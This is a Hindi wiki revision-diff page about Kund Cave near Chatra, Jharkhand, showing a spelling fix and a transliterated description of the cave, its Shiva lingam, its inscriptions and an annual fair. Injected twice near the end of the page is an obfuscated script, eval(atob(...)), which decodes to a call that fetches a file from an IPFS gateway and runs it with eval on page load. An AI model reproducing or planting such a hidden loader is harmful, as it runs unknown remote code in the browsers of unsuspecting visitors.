Difference between revisions of "कुण्ड गुफ़ा चतरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "संन्यास" to "सन्न्यास")
m (Text replacement - "सन्न्यासी" to "संन्यासी")
 
Line 4: Line 4:
 
*कुण्ड गुफ़ा में प्रवेश करने के लिए पर्यटकों को थोड़ी परेशानी का सामना करना पड़ता है क्योंकि इसका प्रवेश द्वार काफ़ी सकरा है।  
 
*कुण्ड गुफ़ा में प्रवेश करने के लिए पर्यटकों को थोड़ी परेशानी का सामना करना पड़ता है क्योंकि इसका प्रवेश द्वार काफ़ी सकरा है।  
 
*कुण्ड गुफ़ा के अन्दर एक बड़ा हॉल भी है जहाँ बहुत अंधेरा रहता है। हॉल में एक [[शिवलिंग]] भी है।  
 
*कुण्ड गुफ़ा के अन्दर एक बड़ा हॉल भी है जहाँ बहुत अंधेरा रहता है। हॉल में एक [[शिवलिंग]] भी है।  
*इस शिवलिंग की स्थापना एक सन्न्यासी ने की थी जो लगभग पचास वर्ष पहले यहाँ आया था।  
+
*इस शिवलिंग की स्थापना एक संन्यासी ने की थी जो लगभग पचास वर्ष पहले यहाँ आया था।  
 
*गुफ़ा की दीवारों पर कुछ लिखा भी गया है लेकिन इस [[लिपि]] को अभी तक पढ़ा नहीं गया है।  
 
*गुफ़ा की दीवारों पर कुछ लिखा भी गया है लेकिन इस [[लिपि]] को अभी तक पढ़ा नहीं गया है।  
 
*[[फाल्गुन]] की 14 तारीख को यहाँ पर भगवान [[शिव]] को समर्पित भव्य मेले का आयोजन किया जाता है। इस मेले में पर्यटक और स्थानीय निवासी समान रूप से भाग लेते हैं।  
 
*[[फाल्गुन]] की 14 तारीख को यहाँ पर भगवान [[शिव]] को समर्पित भव्य मेले का आयोजन किया जाता है। इस मेले में पर्यटक और स्थानीय निवासी समान रूप से भाग लेते हैं।  

Latest revision as of 11:43, 3 August 2017

kund gufa jharakhand rajy ke chatara ke behatarin paryatak sthaloan mean se ek mani jati hai.

  • kund gufa ke pas kund mahal bhi hai jo jirn-shirn avastha mean haian. lekin paryatakoan ko mahal ki apeksha gufa zyada akarshit karati haian.
  • kund gufa paryatakoan ko bahut pasand ati hai kyoanki isake shaant vatavaran mean kuchh kshan bitana unaki thakan ko door deta hai.
  • kund gufa mean pravesh karane ke lie paryatakoan ko tho di pareshani ka samana karana p data hai kyoanki isaka pravesh dvar kafi sakara hai.
  • kund gufa ke andar ek b da h aaul bhi hai jahaan bahut aandhera rahata hai. h aaul mean ek shivaliang bhi hai.
  • is shivaliang ki sthapana ek sannyasi ne ki thi jo lagabhag pachas varsh pahale yahaan aya tha.
  • gufa ki divaroan par kuchh likha bhi gaya hai lekin is lipi ko abhi tak padha nahian gaya hai.
  • phalgun ki 14 tarikh ko yahaan par bhagavan shiv ko samarpit bhavy mele ka ayojan kiya jata hai. is mele mean paryatak aur sthaniy nivasi saman roop se bhag lete haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh